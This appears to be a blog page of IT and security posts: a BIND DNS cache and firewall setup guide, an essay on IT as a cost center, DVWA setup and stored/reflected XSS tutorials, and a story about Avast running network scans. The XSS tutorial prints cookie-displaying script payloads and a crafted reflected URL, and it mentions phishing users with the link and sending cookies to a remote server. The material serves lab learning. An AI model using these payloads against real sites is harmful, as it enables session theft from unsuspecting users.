Skip to content

Reduce Web Page Load Times and Improve Privacy Control

You can use a cache server for a small to medium-sized business no matter the industry or for whatever you would like. A DNS cache doesn’t have to be high maintenance or a menace to other people and organizations as long as you take certain precautions in the configuration.

My reasons for creating a DNS cache are:
1. I don’t trust any free public DNS
2. my organization isn’t going to pay for DNS, and
3. the DNS cache is a lot faster than Quad9, OpenDNS, Cloudflare, and all local ISP DNS server’s.

I used GRC’s DNS Benchmark program to test how long it takes for a query to be answered through our domain DNS setup which is the client -> Active Directory DNS -> Sophos UTM -> DNS server. I tested the new DNS cache server, OpenDNS, Quad9, and Google and took the average of our two internal DNS server’s. The results of the test are below, and although the differences are a couple of hundredths of a second (except for Quad9), it makes a substantial difference when you have ~1,000,000 DNS queries a day. There’s also the added bonus of increased privacy because the DNS cache server recurses to the root DNS servers.

New DNS cache server
cached - 0.000
uncached - 0.057
Dotcom - 0.021

Cloudflare
cached - 0.000
uncached - 0.077
Dotcom - 0.039

Quad9
cached - 0.000
uncached - 0.128
Dotcom - 0.091

OpenDNS
cached - 0.000
uncached - 0.061
Dotcom - 0.039

Google
cached - 0.000
uncached - 0.069
Dotcom - 0.045

I’ve provided a VM that is in the VMDK format and consists of CentOS7 (no GUI) with BIND that weighs in at ~777 MB zipped for testing. Unzipped, the file is 10GB (total partition size). I have not changed any of the configuration settings for SSH or BIND, so they have default settings. The account used to log in, that is non-administrative, is user and it doesn’t have a password. The superuser password is rootroot. As far as warnings, change the superuser password and create a password for the user account as soon as possible. Another good idea would be to create a new account and add it to the sudo group to avoid using the superuser account when editing the BIND configuration file, updating the operating system, and restarting services.

Requirements
1. Two static IP addresses or a single static IP address – some ISP’s allow you to use the dynamic IP that came with your account in addition to the static IP, and if you want to use two static IP addresses, you will have to purchase five.
2. A spare PC or type 1/type 2 virtualization – using a spare PC will be the focus of this article because of the low hardware specifications needed and low complexity.
3. CentOS7 which you can download from here then make a bootable thumb drive using Rufus or Etcher.

The minimum hardware specification for the server is a dual-core processor (AMD or Intel) and 2GB of memory. I tested the minimum hardware specification up to 600k queries in 24 hours, and the maximum CPU load that I observed via atop was 0.63. If you’re doing over 1 million queries every 24 hours, it won’t hurt to go with a quad-core processor and 4GB memory, but that isn’t necessary until 1.5 million to 2 million queries every 24 hours.

If you’re having qualms about using consumer hardware you shouldn’t worry. Sticking with name brands such as EVGA and Rosewill for a power supply and a small solid state drive from Western Digital or Samsung will suffice. I’ve seen consumer hardware run 24/7 for five or six years with few failures, and the failures are typically CPU heat sink fans and case fans.

Performing the following commands through the terminal is recommended, and should be done while connected to your LAN.

Change to the superuser account (enter the password you created during the operating system installation):

$ su

Adds the user account that needs sudoer privileges to the wheel group:

$ adduser -aG wheel <username>

Switch to the user that you added to the wheel group:

$ su - <username>

Test for user account sudo privileges:

$ sudo <command>

Starts the firewalld service and enables firewalld at boot:

$ sudo systemctl start firewalld
$ sudo systemctl enable firewalld

Checks if the firewalld service is running and restart the service:

$ sudo firewall-cmd --state
$ sudo firewall-cmd --reload

Changes the default zone to DMZ because only SSH is allowed inbound:

$ sudo firewall-cmd --set-default-zone=dmz

Restarts firewalld so the new default zone takes effect:

$ sudo firewall-cmd --reload

Displays the active zone and bound interface:

$ sudo firewall-cmd --get-active-zones

Adds inbound port 53 to the DMZ firewall zone as a permanent rule:

$ sudo firewall-cmd --zone=dmz --add-service=dns --permanent

Restarts the firewalld service and displays the allowed inbound services (SSH and DNS):

$ sudo firewall-cmd --reload
$ sudo firewall-cmd --zone=dmz --list-all

The BIND configuration file in CentOS7 is located in /etc/ and is called named.conf. The options portion of the configuration file is where we will be making most of the changes. The path to the BIND configuration sample is /usr/share/doc/bind*/sample/etc/named.conf.

There are five important points to remember when editing the configuration file.
1. You must add a space between the curly brackets and the characters that go between them or the named service (BIND) will not restart.
2. Each line must end with a semi-colon.
3. A semi-colon and space must separate values inside the curly brackets { value; value; };
4. Commenting is accomplished with /* at the beginning and */ at the end of each sentence or paragraph.
5. The default forwarders are the root servers and I don’t see a reason to change that so the forwarder parameter has been omitted.

options {
/* This should include the private static IP address that will be accepting queries */
listen-on port 53 { 127.0.0.1; <private IP>; };

/* Comment out unless you're using IPv6 */
# listen-onv6 port 53 { ::1; };

directory "var/named";
dump-file "/var/named/data/cache_dump.db";
statistics-file "/var/named/data/named_stats.txt";
memstatistics-file "/var/named/data/named_mem_stats.txt";
recursing-file "/var/named/data/named.recursing";
secroots-file "/var/named/data/named.secroots";

/* The public IP must be where you will be sending queries from. Misconfiguration here can l
ead to you and others being attacked */
allow-query-cache { localhost; <public IP>; };
allow-query { localhost; <public IP>; };

/* Recursion is for cache servers only and should be turned off for an authoritative server
*/
recursion yes;

/* Turn on if you are going to use DNSSec aware forwarders (the root servers are DNSSec awar
e) */
dnssec-enable no;
dnssec-validation no;

bind-keys-file "/etc/named.iscdlv.key";
managed-keys-directory "/var/named/dynamic";
pid-file "/run/named/named.pid";
session-keyfile "/run/named/session.key";
};

To check the configuration file for errors run:

$ sudo named-checkconf /etc/named.conf

Start named.service (BIND) at boot

$ sudo systemctl enable named.service

Start named.service:

$ sudo systemctl start named.service

Check if named.service is running:

$ sudo systemctl status named.service

Edit the resolv.conf file and place the loopback address first and a public resolver second:

$ sudo <text editor> /etc/resolv.conf

Output that includes the server IP’s that I chose:

#Generated by NetworkManager
nameserver <private IP address of the DNS cache server>

Update the operating system and installed packages:

$ sudo yum update

If you receive a “Cannot find a valid baseurl for repo:<repo name> when you run the update command, proceed to troubleshooting note 2 at the end of this article.

It’s best practice to use whitelisting for whom can connect via SSH. SSH whitelisting will be accomplished through firewalld.

Add a source IP to the DMZ firewall zone (repeat this command for as many IP addresses that you will be connecting from):

$ sudo firewall-cmd --zone=dmz --add-source=<Public IP used to connect to the server/32> --permanent

Reload the firewall so the changes can take effect:

$ sudo firewall-cmd --reload

Check that all sources have been added to the DMZ firewall zone:

$ sudo firewall-cmd --zone=dmz --list-all

We must tell the firewall to drop all packets that are not our defined source IP addresses (rich-rule):

$ sudo firewall-cmd --zone=dmz --add-rich-rule='rule family="ipv4" source address="<source IP>/32" invert="True" drop'

Reload the firewall so that the rich-rules can take effect:

$ sudo firewall-cmd --reload

The topology diagram and configuration steps are based on Sophos UTM 9.6 since that is what I have at my disposal. I created a DMZ using a whitelist firewall with ports 53, 80, and 443 to Internet IPv4 and IPv6 only (prohibits DMZ to LAN routing and vice versa) to allow for updating the operating system. I also created a destination network address translation (DNAT a.k.a. port forwarding) rule from Internet IPv4 and IPv6 to the private IP of the server for incoming DNS queries.

  1. Configure the internal interface that the DNS server is going to be physically connected to. I chose eth3 and a /30 private class C address space because I need only two addresses – the gateway and the server IP. Eth2 is labeled DMZ on the rear and front of the firewall, but I wanted to leave a space between my LAN ethernet cable and the DMZ ethernet cable.

2. Create an additional address with a public IP address that isn’t in use.

3. Create a new DHCP server that allowes for a single client IP address to be assigned. I’m going to create a DHCP reservation for the IP address that is assigned to the server (192.168.40.2). I removed the “DNS server 1” entry that was the gateway IP address because the server is going to use a list of the root DNS servers in the resolv.conf file.

4. Before we can create a DNAT rule, we must make the DHCP reservation by going to the IPv4 Lease Table (Image 1). The server hostname is DNSCACHE. After clicking “Make Static,” a new window will appear that allows you to make a new host (Image 2).

Image 1
Image 2

5. Configure the layer 3 firewall rules that creates traffic flow with allowed services. Web Surfing is ports 80 and 443. Do not put “Any” in the destination box because traffic will be allowed between your LAN and DMZ.

6. Create a masquerading rule to allow for address translation to make connectivity over outbound ports 53, 80, and 443 possible. This where the private address space is mapped to the public IP by selecting the address labeled DMZ that was created in the second step.

7. It’s time to create the DNAT rule that we did the preparation work for in step four by creating a new host definition. Since we have access control configured in the BIND configuration file (the public IP we will be sending queries from), and our LAN and DMZ are allowed to communicate with internet IPv4 and IPv6 addresses only, we can leave the “Any” address object in the “traffic from” box (Image 1). Make sure to select “Automatic firewall rule.” A DNAT rule for SSH must also be created so we can administer the server.

Image 1
Image 2

8. Last, but certainly not least, enable the IPS for the DNS cache network (Image 1), and make sure DNS under “Misc servers” and 12 months and newer rule age is selected (Image 2).

Image 1
Image 2

Connect the DNS server to the firewall. Change the DNS server used by the firewall for forwarding to your new DNS server by creating a new network definition using the green plus symbol.

Next, create a name for the definition such as DNS Cache Server and enter the public IP address in the IPv4 address box. “Type” will remain as host, click “Save,” then click “Apply” and you are now using your private DNS cache server.

Test the rich-rule that was created for SSH whitelisting by trying to connect to the server via SSH from an IP address that was not defined as a source IP. I used an SSH client on my phone.

Troubleshooting notes:
1. CentOS 7 wasn’t scaling the processor frequency above 1.4GHz (FX-8320E at 3.2GHz). I went into the BIOS and disabled the C6 State and Cool ‘N Quiet then used “$ lscpu” to confirm that the CPU was running ~3.2GHz.


The Cost Center Illogic of IT and Infosec

For decades IT and InfoSec have been looked upon as money suckers as a result of the poor understanding of their value and the true role they play in creating revenue.

The idea of removing IT and InfoSec from a cost center view has stirred up strong emotion on Twitter. I posited that, since IT and InfoSec have become the core of business operations should they be considered a cost center? People replied in agreement that it’s time to move at least IT from the cost center classification to some other term that isn’t in the lexicon of accountants because the definition of cost center doesn’t reflect reality.

Other people responded with accusations that I have an IT/InfoSec world-centric view, which is patently false. I never made my view about IT or InfoSec being greater than another department, such as sales, where you get into the “chicken or the egg” logical circle. You can’t deny that technology and the information systems that support technology are intrinsic in everyday life.

According to the Accounting Coach the definition of a profit center “is a subunit of a company that is responsible revenues and costs,” and the definition of a cost center “is a subunit of a company that is responsible only for its costs.” My view is that IT drives sales beyond what would be capable without IT. InfoSec isn’t as cut and dry as IT because of the different purpose it serves.

Cost recovery for InfoSec (some say there is no cost recovery) becomes obvious when your company is experiencing downtime due to virus infections, ransomware, and the nightmare of information disclosure (accidental or purposely) because it’s money walking out of the front door.

The cost center mentality has harmed IT since its inception, but more so InfoSec over the last eight or nine years as evidenced by the size and volume of breaches and information disclosures. I have seen legitimate projects rejected or shelved that would have benefitted the company had it not been for the “no cost recovery” context that comes with being classified as a cost center.

There are a myriad of studies showing that IT has propelled developing nations GDP.

Here’s a handy list.

https://www.tandfonline.com/doi/abs/10.1080/10438590600661889

https://apcss.org/Publications/Edited%20Volumes/BytesAndBullets/CH3.pdf

https://royalsociety.org/~/media/about-us/international/g-science-statements/2017-may-3-new-economic-growth.pdf?la=en-GB

https://journals.plos.org/plosone/article?id=10.1371/journal.pone.0048903

Microsoft has an IT Business Value Blog, and in an article from 2009, they explain that “There seems to be a steady stream of books published on the role of Information Technology within the business it supports. The role of IT is constantly evolving and has changed significantly from the days when the IT organization was often referred to as “data processing.” Today, in many industries, IT enables some businesses to differentiate themselves from their competitors. Those companies that leverage IT for competitive advantage often differ from their competitors in two ways with respect to their IT organizations: they view IT as a strategic business enabler instead of as a cost center, and they work to maximize the efficiency of their IT operations so that they can focus their resources on providing value to the business and respond to today’s environment of rapidly changing business conditions.”

There is a mountain of evidence that shows how I and others view IT and InfoSec shouldn’t be considered opinion but as fact. Unfortunately, many are still beholden to the archaic cost center mentality because they can’t see past what they’ve been taught.

DVWA Part 2: Exploiting Cross-Site Scripting (XSS) Vulnerabilities

For the second installment of our DVWA series, we are going to look at cross-site scripting (XSS) vulnerabilities and how to exploit them in our Damn Vulnerable Web Application. If you missed part one of this series that shows you how to set up DVWA, you can check it out here.

What is XSS?

Cross-site scripting (from here on out, referred to as XSS) is an injection attack in which malicious scripts are injected into a web application. XSS allows an attacker to send a malicious script to a different user of the web application without their browser being able to acknowledge that this script should not be trusted. The user’s browser sees the script as code that originated from the web application, not from the attacker, and can allow the attacker access to information such as session IDs, cookies, and any other information stored by the browser to use for that site. Typically, web applications are vulnerable to this sort of attack in areas where user input is accepted, and the application does not validate it.

The Difference Between Stored and Reflected XSS

The two most common forms of XSS attacks are stored and reflected attacks. Stored XSS attacks, like the name states, stores the script in the website. For example, this can occur in a message forum. The XSS script is injected into the field submitted into the forum and the target runs the script when they visit the forum, and the page is retrieved by the browser. Reflected XSS attacks occur where the injected script is not stored but instead delivered through other means such as an email or search result.

Checking for XSS Vulnerabilities

To check for a possible XSS vulnerability, you need to test every point of user input to see if you can inject HTML and JavaScript code and whether it gets delivered to the output of the page.

We are going to test for this using the XSS (Stored) page on low security in DVWA.

First, let’s check that our XAMPP server is up and running. Open up a terminal and check the status with the command /opt/lampp/lampp status. If the output shows that the services are running, then you are good to go. If the output shows that the services are not running, start them up with the command /opt/lampp/lampp start.

Let’s now navigate to our DVWA application at 127.0.0.1/DVWA (refer to the link at the top of the page for part one of the series on how to set up DVWA).

Once logged in (username: admin; password: password), we want to navigate to the DVWA Security tab, select “Low” in the drop-down box, and hit Submit.

Now we need to navigate to the XSS (Stored) tab. Here we see a guestbook where users can enter their name and a message to submit to the page. We are going to test both of these for HTML and JavaScript injection.

First, we will enter a normal name and a message to see what the typical output is.

We can see that our responses are output to the page in a pretty standard text.

Now let’s see if the forms will allow us to use HTML tags to change the fonts of our responses.

As we can see by the output of our second post, the web app allowed us to change the HTML composition of the output by using bold and italic HTML tags for our input. This means that we may be able to inject other sorts of tags such as JavaScript tags.

The Name field only allows a certain number of characters, so we will attempt to add a JavaScript alert to the Message field using <script>alert(“JavaScript!”)</script>

When we submit this entry to the page, look what pops up! An alert stating “JavaScript!”.

We now know that we can inject JavaScript into this form. In the next section, we will take a look at how we can exploit this to get a valid user cookie and session ID

Stored XSS Exploit

Now that we know the page is vulnerable to XSS while on low security, let’s see how we can get our cookie and session ID to display.

To do this, we are going to use a similar JavaScript alert, but this time use document.cookie as the alert parameter.

Note: Hit “Clear Guestbook” button so that you do not get the previous “JavaScript!” alert.

We now have our session ID displayed to the screen. Because this is a stored XSS attack, this will be persistent until we clear the Guestbook. We can click out of the alert, change tabs, and then come back to this tab and this alert will pop up again which means that every time a user visits this tab, their session ID will be displayed in an alert.

Reflected XSS Exploit

Now let’s head on over to the XSS (Reflected) tab and check out how we can do a reflected XSS exploitation.

Our goal for this section is to create a URL that when clicked, displays our cookie and session ID in an alert.

Let’s get started by entering a simple response to the form to see what the standard output is and checking out the URL displayed.

As we can see, our input is taken and then displayed to the screen in the string “Hello [our input]” as well as in the URL where it is added as the value of the name variable.

Let’s now try and input the script that we used in the last section to display the cookie and session ID: <script>alert(document.cookie)</script>.

It works! Our session ID is posted to the screen in an alert, and when we take a look at the URL, it shows the script assigned as the value for the name variable.

Let’s take note of the URL that we want to have submitted to that page for the exploit to work: http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<script>alert(document.cookie)<%2Fscript>#.

In this case, the user’s cookies will not be displayed when they navigate to XSS (Reflected) tab on their own like in the previous section because the input we give the form is not stored in the application. Instead, we need to send the above link to a user in a social engineering attempt (such as a phishing email) to get them to send the reflected XSS attack themselves. Let’s try this out and open up a new tab and navigate to this link in the new tab (while keeping the previous tab open).

Success! When we navigate to the link, it again displays our cookie and session ID.

So there you have it. In this tutorial, we were able to exploit DVWA with both stored and reflected XSS to display the cookie and session ID in an alert. If we wanted to take this a step further for more practical use, instead of having the alert pop up for a user that visits the website, it could instead be sent to a remote server that we are running. This way, we receive the session ID and can authenticate as that user.

Installing Damn Vulnerable Web Application (DVWA) Using XAMPP in Kali Linux

In order to learn web app exploitation safely (and legally), it is useful to have practice applications to run on your local environment. Damn Vulnerable Web Application (DVWA) was created for just this purpose. DVWA contains many common web vulnerabilities such as SQL injection, XSS, and more that allow you to hone your web hacking skills.

In this article, we will go over how to install DVWA using XAMPP web server in Kali Linux.

Downloading XAMPP

To start, we need to download XAMPP to our Kali Linux machine at https://www.apachefriends.org/download.html. We will download the latest version listed for Linux (currently 7.2.7 at the writing of this article) and save the file.

Next we will open our terminal and navigate to our Downloads directory using: cd Downloads

Once in the Downloads directory, we use the command ls -l to get a list of the files and their permissions.

As seen in the screenshot above, we do not currently have execute permissions on the XAMPP installer. To add execute permissions, we perform the following command: chmod +x xampp-linux-x64-7.2.7-0-installer.run (note: make sure to replace the file name with the one that you currently have in your directory).

When we check the file permissions again, we have the execute permission on the file as shown by the “x” and the green color of the file name.

The next step is to run the installer using the command: ./xampp-linux-x64-7.2.7-0-installer.run.

A setup wizard will pop up to go through the steps of installing. While installing ensure the following:

  • Both “XAMPP Core Files” and “XAMPP Developer Files” are checked
  • Take note of the path that is being used for installation (/opt/lampp)
  • Ignore the Internet pop-up and continue with the installation
  • You do not need to launch XAMPP upon finishing the installation

Once XAMPP is installed, we will go to the XAMPP control panel and make sure the MySQL database server and Apache Web Server is running by doing the following:

  • Navigate to /opt/lampp either in your terminal or in the files finder (from Places > Computer).
  • Locate the manager-linux-x64.run and open it
    • From terminal: ./manager-linux-x64.run
    • From files finder: double-click
  • Click “Manage Servers” tab at the top
  • Make sure both servers show as “Running”
    • If the status of either does not show “Running” then select it and then click “Start” on the right

Downloading DVWA

To download DVWA we go to http://www.dvwa.co.uk/ and hit the big download button at the bottom of the page and save the file.

Again, we will open up our terminal and navigate to the Downloads directory and use ls -l to show the files.

The file is zipped, so we will need to unzip it using the command: unzip DVWA-master.zip.

Now that it is unzipped, we are going to rename the file from DVWA-master to dvwa for ease of use utilizing the command: mv DVWA-master dvwa.

To use DVWA in XAMPP, we will move the dvwa file to the public HTML folder within the installation path that we noted earlier (/opt/lampp). To do this we use the command: mv dvwa /opt/lampp/htdocs.

We need to go into the DVWA configuration file and remove the database password located in the folder /opt/lampp/htdocs/dvwa/config. Once navigated to the directory, we will open the file using Nano text editor (note: you can use whatever text editor you like): nano config.inc.php.dist.

Using our arrow keys, we navigate down to the db_password line and delete the password so that it just shows two quotation marks as seen below.

Next, we will hit control+o on our keyboard to write out the changes to the file then hit enter to confirm. Then we will hit control+x to exit Nano.

Once that is completed, we need to copy config/config.inc.php.dist to config/config.inc.php. While still in the config directory use the command: cp config.inc.php.dist config.inc.php

Using DVWA with XAMPP

Now that all of the installations are done, we will open up Firefox and navigate to the web address http://127.0.0.1/dvwa.

Now we need to create the database. Navigate to the bottom of the page and click the “Create / Reset Database” button.

Once the database is created, it should take you to the login page after a few seconds or you may need to navigate to the login page.

To log in use the below credentials:

  • Username: admin
  • Password: password

That’s it. You are logged into DVWA and you can do all of your evil deeds in a safe and legal environment. Please note that you may need to go to the “DVWA Security” tab and change the Security Level to adjust the difficulty of compromise.

 

A story about “free” antivirus

A colleague of mine was working on a coworkers personal computer. The job was a fresh Windows 10 installation, and my colleague decided to install Avast Antivirus Free. Shortly after installing Avast Security Onion lit up like a Christmas tree. I didn’t recognize the IP address that the alerts were originating from, so I went into our equipment room where I found the PC plugged in. When I unplugged the ethernet cable, the alerts stopped so I knew I had found the culprit.

Upon initial investigation, I saw that Malwarebytes and Avast were installed. I’ve worked with Malwarebytes in the past and knew that the activity I saw in Security Onion wasn’t typical of it, but I didn’t rule out an altered installer that was retrieved from an untrusted source. I uninstalled Malwarebytes as my first step then I went home because it was the end of the workday. When I came in the next day (Thursday) I saw that there were a few of the same alerts from the previous day, overnight. I chalked the overnight alerts up to Avast then uninstalled it and installed Sophos Home, a far superior product in my opinion.

Just so we’re on the same page, I haven’t used Avast in over a decade because of their bloatware and the tactics used to get you to upgrade to the paid version. Avast has a good signature repository, but with 300,000 new pieces of malware produced daily, they’ve become a one trick pony security solution.

The next day (Friday) I spun up a Windows 10 1803 VM and installed Avast only, then I was quite busy the rest of the day. It wasn’t until Monday that I was able to get back to the VM where I ran a scan manually. The alerts that pop-up during a scan without the advanced features enabled are below.

The alerts are a result of a “Network Threat Scan” that is actually an unauthenticated vulnerability scan. The first two times I ran the scan (physical then VM) the same hosts were chosen for testing, but a third scan (second from the VM) chose different hosts except for the network firewall. The method used to decide which host is tested is unknown.

I asked my colleague where he downloaded the Avast installer from and he said that it was an old version from CNET that he had downloaded that day. The thing is, CNET doesn’t carry an old version of Avast. I downloaded the Avast installer from CNET and directly from Avast then hashed them using SHA1. The hashes were different, the installer downloaded from CNET was signed one day and one hour later than the installer downloaded from Avast, and they are the same size, 175KB. Both installers are downloaded and updated from Avast servers.

The left window is the installer downloaded from Avast. The right window is the installer downloaded from CNET.

 

The left window is the SHA1 hash of the installer downloaded from Avast. The right window is the SHA1 hash of the installer downloaded from CNET.

The idea is that any information that you put into a free product will be used to track you and serve advertisements or be sold to compensate for your use of the product.

Surely, a security company wouldn’t do that, right?

Maybe.

I went to the Avast End User License Agreement (EULA) from the Settings -> About Avast menu in the antivirus application where roughly halfway down the page was a link to the privacy policy. Privacy policies are purposely vague to give the company has as much legal leeway as possible when it comes to using your data. Avast is no different.

 

After clicking on the Privacy Policy link, you’re taken here.

The Privacy Policy begins by describing its purpose, its goal, and limits (vaguely) which none of the language sets off any alarms. Things get interesting in section five paragraph three where it’s stated that third-party ads are delivered to users of their mobile product. Mobile devices are one of the most popular attack vectors and combine that with ad networks being purposely insecure (for the sake of speed and profit) you have a dangerous combination. Their “most trusted” claim in the opening paragraph is starting to look shaky.

So far Avast has said that they collect your personal data to conduct business, deliver services, improve products, etc. all while being GDPR compliant, then they deliver code that immediately executes to your mobile device that contains highly valued and sought after data that ultimately has little protection even when using antivirus.

In the Service Data section, Avast describes what they collect and state that they deanonymize the data they collect about your product usage without any details. I can’t find any reasons why Avast would need vulnerability scan data from your network except to bait you into buying more licenses. Based on the typical person that uses Avast Antivirus Free, they would have no idea how to remediate what the vulnerability scan found other than to spend more money.

I haven’t been able to find where research is defined which is what I believe they use to collect more data than they need.

Here’s more research usage without specifics for Device and Network Information, and at the end of the section, they state “serve our legitimate interests” without describing what that is.

I conducted an unscientific poll on Twitter and 91% of respondents said that they wouldn’t be comfortable with Avast having the results on a vulnerability scan.

https://twitter.com/Milwizzle/status/1018905788147032064